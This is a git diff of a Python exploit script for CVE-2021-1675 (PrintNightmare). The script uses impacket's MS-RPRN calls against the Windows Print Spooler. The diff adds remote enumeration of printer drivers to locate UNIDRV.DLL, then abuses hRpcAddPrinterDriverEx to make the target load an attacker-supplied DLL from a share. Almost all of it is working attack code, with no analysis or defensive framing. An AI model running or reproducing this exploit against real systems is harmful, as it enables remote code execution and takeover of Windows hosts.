diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py
index 072334b..7f5d527 100644
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -2,9 +2,34 @@
 from impacket.dcerpc.v5 import rprn
 from impacket.dcerpc.v5 import transport
 from impacket.dcerpc.v5.dtypes import NULL
+from impacket.structure import Structure
 import argparse
 import sys
 import time
+import pathlib
+
+#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
+class DRIVER_INFO_2_BLOB(Structure):
+    structure = (
+        ('cVersion','<L'),
+        ('NameOffset', '<L'),
+        ('EnvironmentOffset', '<L'),
+        ('DriverPathOffset', '<L'),
+        ('DataFileOffset', '<L'),
+        ('ConfigFileOffset', '<L'),
+    )
+
+    def __init__(self, data = None):
+        Structure.__init__(self, data = data)
+
+    def fromString(self,data):
+        Structure.fromString(self, data)
+        self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
+        self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
+        self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
+        self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
+        self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
+
 
 def connect(username, password, domain, lmhash, nthash, address, port):
     binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
@@ -29,10 +54,36 @@ def connect(username, password, domain, lmhash, nthash, address, port):
     return dce
 
 
+def getDrivers(dce, handle=NULL):
+    #get drivers
+    resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
+    data = b''.join(resp['pDrivers'])
+
+    #parse drivers
+    blob = DRIVER_INFO_2_BLOB()
+    blob.fromString(data)
+    #blob.dump()
+    
+    return blob
+
+
 def main(username, password, domain, lmhash, nthash, address, port, share):
     #connect
     dce = connect(username, password, domain, lmhash, nthash, address, port)
-    
+    #handle = "\\\\{0}\x00".format(address)
+    handle = NULL
+
+    #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
+    try:
+        blob = getDrivers(dce, handle)
+        pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
+    except Exception as e:
+        print('[-] Failed to enumerate remote pDriverPath')
+        print(str(e))
+        sys.exit(1)
+
+    print("[+] pDriverPath Found {0}".format(pDriverPath))
+
     #build DRIVER_CONTAINER package
     container_info = rprn.DRIVER_CONTAINER()
     container_info['Level'] = 2
@@ -40,21 +91,17 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
     container_info['DriverInfo']['Level2']['cVersion']     = 3
     container_info['DriverInfo']['Level2']['pName']        = "1234\x00"
     container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
-    container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
+    container_info['DriverInfo']['Level2']['pDriverPath']  = pDriverPath + '\x00'
     container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
     container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"
 
-
     flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
-    #handle = "\\\\{0}\x00".format(address)
-    handle = NULL
     filename = share.split("\\")[-1]
-
-    print("[*] Uploading {0}".format(share))
+    print("[*] Executing {0}".format(share))
 
     resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
     print("[*] Stage0: {0}".format(resp['ErrorCode']))
-    for i in range(1, 50):
+    for i in range(1, 30):
         try:
             container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
             resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
diff --git a/Images/poc.png b/Images/poc.png
index b0c972a..2495879 100644
Binary files a/Images/poc.png and b/Images/poc.png differ